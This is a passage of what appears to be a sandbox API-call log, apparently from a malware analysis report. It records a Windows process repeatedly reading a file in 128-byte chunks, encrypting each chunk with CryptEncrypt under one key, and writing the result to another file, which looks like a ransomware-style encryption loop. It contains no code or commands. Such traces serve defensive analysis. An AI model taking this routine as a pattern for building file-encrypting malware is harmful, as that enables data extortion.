lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.091] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.092] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.092] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.092] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.092] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.092] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.092] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.092] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.093] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.093] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.093] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.093] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.093] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.093] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.094] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.094] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.094] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.094] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.094] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.094] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.095] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.095] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.095] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.095] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.095] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.095] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.096] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.096] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.096] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.096] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.096] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.096] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.096] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.097] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.097] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.097] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.097] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.097] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.097] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.098] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.098] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.098] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, 